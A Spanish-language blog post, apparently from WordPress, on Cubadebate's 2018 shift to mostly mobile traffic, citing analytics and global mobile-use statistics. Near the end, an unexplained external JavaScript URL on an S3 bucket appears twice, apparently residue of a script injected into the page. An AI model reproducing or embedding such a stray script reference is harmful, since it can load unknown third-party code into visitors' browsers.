Cubadebate viaja en los móviles

Posted on Actualizado enn

Cuba, con sus particularidades ciertas, vive dinámicas similares en la internet a las que se expresan internacionalmente en el espacio público digital. Y sus portales y sitios web líderes son reflejos de tales influjos.

Por primera vez en su historia, Cubadebate ha tenido durante todo el año más visitas al sitio desde dispositivos móviles que desde Computadoras o laptops. Eso sólo había ocurrido en meses puntuales de urgencias informativas, como en Septiembre de 2017 cuando el paso del Huracán Irma.

Sin embargo, desde enero de 2018 hasta hoy, han sido más los usuarios que han llegado hasta nosotros desde sus móviles cada mes, en una tendencia equiparable a lo que se expresa hoy en el mundo de la Internet.

Una mirada a las estadísticas de Cubadebate en Google Analytics permite corroborar la tendencia:

 

En el 2017, las visitas desde dispositivos móviles habían promediado el 42.1% de las recibidas por Cubadebate. En el 2016 habían sido apenas el 28.6%, en el 2015 el 26.4% y en el 2014 el 22.2%.

Conscientes de esa tendencia y de la anunciada llegada de la conexión a datos por móviles en Cuba, Cubadebate presentó en agosto su versión de prueba de la APK del sitio, desarrollado por un equipo de la empresa de softwares DESOFT. Un empeño que queremos perfeccionar y ampliar su alcance.

Cubadebate vive y se beneficia así de la tendencia mundial de un creciente acceso a la web desde los dispositivos móviles.

Desde fines de 2017 están activas en el mundo más líneas móviles que el número de habitantes del planeta (7 800 millones de tarjetas SIM activadas frente a 7 600 millones de personas) y el número sigue creciendo. Aunque el total de usuarios únicos de la telefonía móvil es de unos 5 mil millones de personas, según los datos del informe anual Mobile Economy de la GSMA, revelado en febrero de 2018.

Cada vez hay más móviles conectados a la internet. El informe We are Social de Hootsuite, de enero de 2018, revelaba que ya eran entonces 3 722 millones de usuarios los que se conectan desde sus dispositivos móviles, de un total de 4 021 millones de usuarios activos en la internet del mundo (53% de la población mundial); aunque es frecuente que las personas se conecten desde más de un dispositivo.

Paralelamente, crece también el número de los que se informan desde sus móviles. Según el Pew Research Center (junio de 2018) ocho de cada diez adultos de EE.UU reciben y consultan noticias en un dispositivo móvil (85%), aun cuando la TV es todavía el medio donde los estadounidenses más reconocen enterarse de las noticias.

En España, la más reciente encuesta Navegantes en la red de la Asociación para la Investigación de Medios de Comunicación (AIMC) refleja que el móvil es el dispositivo preferido por los españoles para conectarse a la web. Según el estudio, el 92,1% de los usuarios utiliza el móvil para la actividad online. El móvil es el dispositivo principal de conexión a internet con un 36.9%, seguido por los ordenadores de mesa (30.6%) y los portátiles (26,6%). El 65.9% de los que utilizan los datos en los móviles leen noticias en sus celulares.

 

Con el inicio de los servicios de datos móviles en Cuba y el bono de 300 Mb adicionales en cada paquete para navegación .cu, la proporción de visitas a Cubadebate desde celulares debe seguir creciendo; más si tenemos en cuenta que casi el 65% de las visitas al sitio proceden de nuestro público más cercano: los cubanos.

Todavía es muy pronto para evidenciar tendencias. Pero, una mirada a las estadísticas de la pasada semana -a pocos días de que comenzara el servicio en todo el país-, muestra que el 60.75% de los usuarios llegaron a Cubadebate desde dispositivos móviles. Lo más notorio es que el 68% de ellos son usuarios nuevos. Buenas señales que auguran que Cubadebate viajará, cada vez más, en los móviles de sus lectores.

 

 

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Deja una respuesta

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Salir /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s